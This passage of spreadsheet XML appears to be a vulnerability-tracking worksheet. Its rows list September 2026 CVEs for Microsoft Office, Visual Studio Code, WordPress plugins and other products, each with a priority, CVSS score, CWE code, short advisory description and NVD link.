s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1134" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78520</t></is></c></row><row r="1135"><c r="A1135" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1135" s="5" t="inlineStr"><is><t>CVE-2026-78522</t></is></c><c r="D1135" s="5" t="n"><v>6.5</v></c><c r="E1135" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1135" s="5" t="inlineStr" /><c r="H1135" s="5" t="n"><v>0.007</v></c><c r="I1135" s="5" t="inlineStr" /><c r="J1135" s="5" t="inlineStr" /><c r="K1135" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1135" s="5" t="inlineStr" /><c r="M1135" s="5" t="inlineStr" /><c r="N1135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1135" s="5" t="inlineStr" /><c r="R1135" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1135" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78522</t></is></c></row><row r="1136"><c r="A1136" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1136" s="5" t="inlineStr"><is><t>CVE-2026-78838</t></is></c><c r="D1136" s="5" t="n"><v>6.5</v></c><c r="E1136" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1136" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1136" s="5" t="inlineStr" /><c r="H1136" s="5" t="n"><v>0.004</v></c><c r="I1136" s="5" t="inlineStr" /><c r="J1136" s="5" t="inlineStr" /><c r="K1136" s="5" t="inlineStr" /><c r="L1136" s="5" t="inlineStr" /><c r="M1136" s="5" t="inlineStr" /><c r="N1136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1136" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1136" s="5" t="inlineStr" /><c r="R1136" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1136" s="5" t="inlineStr"><is><t>A reflected cross-site scripting (XSS) vulnerability in the grid_datasource.php component of AppNitro MachForm v30 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted payload into the filter[filters][0][field] parameter.</t></is></c><c r="T1136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78838</t></is></c></row><row r="1137"><c r="A1137" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1137" s="5" t="inlineStr"><is><t>CVE-2026-79379</t></is></c><c r="D1137" s="5" t="n"><v>6.5</v></c><c r="E1137" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1137" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1137" s="5" t="inlineStr" /><c r="H1137" s="5" t="n"><v>0.003</v></c><c r="I1137" s="5" t="inlineStr" /><c r="J1137" s="5" t="inlineStr" /><c r="K1137" s="5" t="inlineStr" /><c r="L1137" s="5" t="inlineStr" /><c r="M1137" s="5" t="inlineStr" /><c r="N1137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1137" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1137" s="5" t="inlineStr" /><c r="R1137" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1137" s="5" t="inlineStr"><is><t>A buffer overflow in the SBC_DecodeFrames() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier and fixed in v.5.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted frame.</t></is></c><c r="T1137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79379</t></is></c></row><row r="1138"><c r="A1138" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1138" s="5" t="inlineStr"><is><t>CVE-2026-79573</t></is></c><c r="D1138" s="5" t="n"><v>6.5</v></c><c r="E1138" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1138" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1138" s="5" t="inlineStr" /><c r="H1138" s="5" t="n"><v>0.003</v></c><c r="I1138" s="5" t="inlineStr" /><c r="J1138" s="5" t="inlineStr" /><c r="K1138" s="5" t="inlineStr" /><c r="L1138" s="5" t="inlineStr" /><c r="M1138" s="5" t="inlineStr" /><c r="N1138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1138" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1138" s="5" t="inlineStr" /><c r="R1138" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1138" s="5" t="inlineStr"><is><t>L-ONE v1.0.0 was discovered to contain multiple SQL injection vulnerabilities in the /attachment/getBusinessUploadList component via the busid, id, and taskid parameters. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T1138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79573</t></is></c></row><row r="1139"><c r="A1139" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1139" s="5" t="inlineStr"><is><t>CVE-2026-80073</t></is></c><c r="D1139" s="5" t="n"><v>6.5</v></c><c r="E1139" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1139" s="5" t="inlineStr" /><c r="H1139" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1139" s="5" t="inlineStr" /><c r="J1139" s="5" t="inlineStr" /><c r="K1139" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L1139" s="5" t="inlineStr" /><c r="M1139" s="5" t="inlineStr" /><c r="N1139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1139" s="5" t="inlineStr" /><c r="R1139" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1139" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80073</t></is></c></row><row r="1140"><c r="A1140" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1140" s="5" t="inlineStr"><is><t>CVE-2026-80076</t></is></c><c r="D1140" s="5" t="n"><v>6.5</v></c><c r="E1140" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1140" s="5" t="inlineStr" /><c r="H1140" s="5" t="n"><v>0.007</v></c><c r="I1140" s="5" t="inlineStr" /><c r="J1140" s="5" t="inlineStr" /><c r="K1140" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1140" s="5" t="inlineStr" /><c r="M1140" s="5" t="inlineStr" /><c r="N1140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1140" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1140" s="5" t="inlineStr" /><c r="R1140" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1140" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80076</t></is></c></row><row r="1141"><c r="A1141" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1141" s="5" t="inlineStr"><is><t>CVE-2026-80078</t></is></c><c r="D1141" s="5" t="n"><v>6.5</v></c><c r="E1141" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1141" s="5" t="inlineStr" /><c r="H1141" s="5" t="n"><v>0.007</v></c><c r="I1141" s="5" t="inlineStr" /><c r="J1141" s="5" t="inlineStr" /><c r="K1141" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1141" s="5" t="inlineStr" /><c r="M1141" s="5" t="inlineStr" /><c r="N1141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1141" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1141" s="5" t="inlineStr" /><c r="R1141" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1141" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80078</t></is></c></row><row r="1142"><c r="A1142" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1142" s="5" t="inlineStr"><is><t>CVE-2026-80079</t></is></c><c r="D1142" s="5" t="n"><v>6.5</v></c><c r="E1142" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1142" s="5" t="inlineStr" /><c r="H1142" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1142" s="5" t="inlineStr" /><c r="J1142" s="5" t="inlineStr" /><c r="K1142" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1142" s="5" t="inlineStr" /><c r="M1142" s="5" t="inlineStr" /><c r="N1142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1142" s="5" t="inlineStr" /><c r="R1142" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1142" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80079</t></is></c></row><row r="1143"><c r="A1143" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1143" s="5" t="inlineStr"><is><t>CVE-2026-80082</t></is></c><c r="D1143" s="5" t="n"><v>6.5</v></c><c r="E1143" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1143" s="5" t="inlineStr" /><c r="H1143" s="5" t="n"><v>0.007</v></c><c r="I1143" s="5" t="inlineStr" /><c r="J1143" s="5" t="inlineStr" /><c r="K1143" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1143" s="5" t="inlineStr" /><c r="M1143" s="5" t="inlineStr" /><c r="N1143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1143" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1143" s="5" t="inlineStr" /><c r="R1143" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1143" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80082</t></is></c></row><row r="1144"><c r="A1144" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1144" s="5" t="inlineStr"><is><t>CVE-2026-80084</t></is></c><c r="D1144" s="5" t="n"><v>6.5</v></c><c r="E1144" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1144" s="5" t="inlineStr" /><c r="H1144" s="5" t="n"><v>0.007</v></c><c r="I1144" s="5" t="inlineStr" /><c r="J1144" s="5" t="inlineStr" /><c r="K1144" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1144" s="5" t="inlineStr" /><c r="M1144" s="5" t="inlineStr" /><c r="N1144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1144" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1144" s="5" t="inlineStr" /><c r="R1144" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1144" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80084</t></is></c></row><row r="1145"><c r="A1145" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1145" s="5" t="inlineStr"><is><t>CVE-2026-80086</t></is></c><c r="D1145" s="5" t="n"><v>6.5</v></c><c r="E1145" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1145" s="5" t="inlineStr" /><c r="H1145" s="5" t="n"><v>0.007</v></c><c r="I1145" s="5" t="inlineStr" /><c r="J1145" s="5" t="inlineStr" /><c r="K1145" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1145" s="5" t="inlineStr" /><c r="M1145" s="5" t="inlineStr" /><c r="N1145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1145" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1145" s="5" t="inlineStr" /><c r="R1145" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1145" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80086</t></is></c></row><row r="1146"><c r="A1146" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1146" s="5" t="inlineStr"><is><t>CVE-2026-80087</t></is></c><c r="D1146" s="5" t="n"><v>6.5</v></c><c r="E1146" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1146" s="5" t="inlineStr" /><c r="H1146" s="5" t="n"><v>0.007</v></c><c r="I1146" s="5" t="inlineStr" /><c r="J1146" s="5" t="inlineStr" /><c r="K1146" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1146" s="5" t="inlineStr" /><c r="M1146" s="5" t="inlineStr" /><c r="N1146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1146" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1146" s="5" t="inlineStr" /><c r="R1146" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1146" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80087</t></is></c></row><row r="1147"><c r="A1147" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1147" s="5" t="inlineStr"><is><t>CVE-2026-80088</t></is></c><c r="D1147" s="5" t="n"><v>6.5</v></c><c r="E1147" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1147" s="5" t="inlineStr" /><c r="H1147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1147" s="5" t="inlineStr" /><c r="J1147" s="5" t="inlineStr" /><c r="K1147" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1147" s="5" t="inlineStr" /><c r="M1147" s="5" t="inlineStr" /><c r="N1147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1147" s="5" t="inlineStr" /><c r="R1147" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1147" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80088</t></is></c></row><row r="1148"><c r="A1148" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1148" s="5" t="inlineStr"><is><t>CVE-2026-80089</t></is></c><c r="D1148" s="5" t="n"><v>6.5</v></c><c r="E1148" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1148" s="5" t="inlineStr" /><c r="H1148" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1148" s="5" t="inlineStr" /><c r="J1148" s="5" t="inlineStr" /><c r="K1148" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1148" s="5" t="inlineStr" /><c r="M1148" s="5" t="inlineStr" /><c r="N1148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1148" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1148" s="5" t="inlineStr" /><c r="R1148" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1148" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80089</t></is></c></row><row r="1149"><c r="A1149" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1149" s="5" t="inlineStr"><is><t>CVE-2026-80090</t></is></c><c r="D1149" s="5" t="n"><v>6.5</v></c><c r="E1149" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1149" s="5" t="inlineStr" /><c r="H1149" s="5" t="n"><v>0.007</v></c><c r="I1149" s="5" t="inlineStr" /><c r="J1149" s="5" t="inlineStr" /><c r="K1149" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1149" s="5" t="inlineStr" /><c r="M1149" s="5" t="inlineStr" /><c r="N1149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1149" s="5" t="inlineStr" /><c r="R1149" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1149" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80090</t></is></c></row><row r="1150"><c r="A1150" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1150" s="5" t="inlineStr"><is><t>CVE-2026-80091</t></is></c><c r="D1150" s="5" t="n"><v>6.5</v></c><c r="E1150" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1150" s="5" t="inlineStr" /><c r="H1150" s="5" t="n"><v>0.007</v></c><c r="I1150" s="5" t="inlineStr" /><c r="J1150" s="5" t="inlineStr" /><c r="K1150" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1150" s="5" t="inlineStr" /><c r="M1150" s="5" t="inlineStr" /><c r="N1150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1150" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1150" s="5" t="inlineStr" /><c r="R1150" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1150" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80091</t></is></c></row><row r="1151"><c r="A1151" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1151" s="5" t="inlineStr"><is><t>CVE-2026-81377</t></is></c><c r="D1151" s="5" t="n"><v>6.5</v></c><c r="E1151" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1151" s="5" t="inlineStr" /><c r="H1151" s="5" t="n"><v>0.008</v></c><c r="I1151" s="5" t="inlineStr" /><c r="J1151" s="5" t="inlineStr" /><c r="K1151" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1151" s="5" t="inlineStr" /><c r="M1151" s="5" t="inlineStr" /><c r="N1151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1151" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1151" s="5" t="inlineStr" /><c r="R1151" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1151" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to perform tampering over a network.</t></is></c><c r="T1151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81377</t></is></c></row><row r="1152"><c r="A1152" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1152" s="5" t="inlineStr"><is><t>CVE-2026-81792</t></is></c><c r="D1152" s="5" t="n"><v>6.5</v></c><c r="E1152" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1152" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1152" s="5" t="inlineStr" /><c r="H1152" s="5" t="n"><v>0.002</v></c><c r="I1152" s="5" t="inlineStr" /><c r="J1152" s="5" t="inlineStr" /><c r="K1152" s="5" t="inlineStr" /><c r="L1152" s="5" t="inlineStr" /><c r="M1152" s="5" t="inlineStr" /><c r="N1152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1152" s="5" t="inlineStr" /><c r="R1152" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1152" s="5" t="inlineStr"><is><t>Unauthenticated Privilege Escalation in Product Catalog Enquiry for WooCommerce by MultiVendorX &lt;= 6.1.4 versions.</t></is></c><c r="T1152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81792</t></is></c></row><row r="1153"><c r="A1153" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1153" s="5" t="inlineStr"><is><t>CVE-2026-81802</t></is></c><c r="D1153" s="5" t="n"><v>6.5</v></c><c r="E1153" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1153" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1153" s="5" t="inlineStr" /><c r="H1153" s="5" t="n"><v>0.002</v></c><c r="I1153" s="5" t="inlineStr" /><c r="J1153" s="5" t="inlineStr" /><c r="K1153" s="5" t="inlineStr" /><c r="L1153" s="5" t="inlineStr" /><c r="M1153" s="5" t="inlineStr" /><c r="N1153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1153" s="5" t="inlineStr" /><c r="R1153" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1153" s="5" t="inlineStr"><is><t>Unauthenticated Insecure Direct Object References (IDOR) in WpEvently &lt;= 5.6.0 versions.</t></is></c><c r="T1153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81802</t></is></c></row><row r="1154"><c r="A1154" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1154" s="5" t="inlineStr"><is><t>CVE-2026-82059</t></is></c><c r="D1154" s="5" t="n"><v>6.5</v></c><c r="E1154" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1154" s="5" t="inlineStr" /><c r="H1154" s="5" t="n"><v>0.003</v></c><c r="I1154" s="5" t="inlineStr" /><c r="J1154" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1154" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1154" s="5" t="inlineStr" /><c r="M1154" s="5" t="inlineStr" /><c r="N1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1154" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1154" s="5" t="inlineStr" /><c r="R1154" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1154" s="5" t="inlineStr"><is><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is></c><c r="T1154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t></is></c></row><row r="1155"><c r="A1155" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1155" s="5" t="inlineStr"><is><t>CVE-2026-82069</t></is></c><c r="D1155" s="5" t="n"><v>6.5</v></c><c r="E1155" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1155" s="5" t="inlineStr" /><c r="H1155" s="5" 